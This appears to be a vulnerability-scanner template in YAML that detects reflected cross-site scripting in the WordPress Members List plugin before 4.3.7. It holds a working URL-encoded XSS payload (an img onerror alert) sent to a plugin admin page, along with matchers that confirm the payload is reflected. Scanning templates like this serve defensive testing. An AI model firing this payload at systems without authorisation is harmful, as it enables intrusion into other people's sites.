40 lines
1.1 KiB
YAML
40 lines
1.1 KiB
YAML
id: members-list-xss
|
|
|
|
info:
|
|
name: WordPress Members List <4.3.7 - Cross-Site Scripting
|
|
author: Akincibor
|
|
severity: medium
|
|
description: WordPress Members List 4.3.7 does not sanitize and escape some parameters in various pages before outputting them back, leading to reflected cross-site scripting vulnerabilities.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/d13f26f0-5d91-49d7-b514-1577d4247648
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
cvss-score: 7.2
|
|
cwe-id: CWE-79
|
|
tags: wp,wordpress,wp-plugin,xss,wpscan
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-content/plugins/members-list/admin/view/user.php?page=%22%3E%3Cimg%20src%20onerror=alert(document.domain)%20x'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"><img src onerror=alert(document.domain) x'
|
|
- "wrap tern-wrap"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/09/07
|